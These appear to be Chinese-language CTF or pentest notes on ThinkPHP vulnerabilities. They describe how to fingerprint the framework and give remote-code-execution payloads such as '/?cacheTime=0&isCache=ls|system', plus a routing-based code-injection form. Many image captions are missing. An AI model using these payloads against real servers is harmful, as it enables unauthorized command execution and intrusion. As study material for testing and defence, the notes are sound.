tp漏洞

一-识别tp框架(指纹)

1.1 ioc判断

/favicon.ico

img

image-20241125193711067

1.2报错

img

img

或者 /index.php/index/index/1

1.3错误传参

img

img

/?c=4e5e5d7364f443e28fbf0d3ae744a59a

/4e5e5d7364f443e28fbf0d3ae744a59a

img

p3.1和3.2版本

4e5e5d7364f443e28fbf0d3ae744a59a-index.html

1.5 body特征

body里有"十年磨一剑" 或者"ThinkPHP"

1.6插件

img

二、利用方法

数据通过竖线分开, 前面为参数, 后面为函数。例如:

1
2
/?cacheTime=0&isCache=ls|system  
/index.php/?cacheTime=0&isCache=ls|system #上面不行就换下面

根据 thinkphp 的路由规则:

1
2
3
4
5
由于ThinkPHP存在两种路由规则,如下所示
http://serverName/index.php/模块/控制器/操作/[参数名/参数值...]
如果不支持PATHINFO的服务器可以使用兼容模式访问如下:
http://serverName/index.php?s=/模块/控制器/操作/[参数名/参数值...]
也可采用 index.php/a/b/c/${code}一下形式。

访问 /index.php/index/index,能够走到题目给出的Index\index里。

所以一般要先加上路由路径。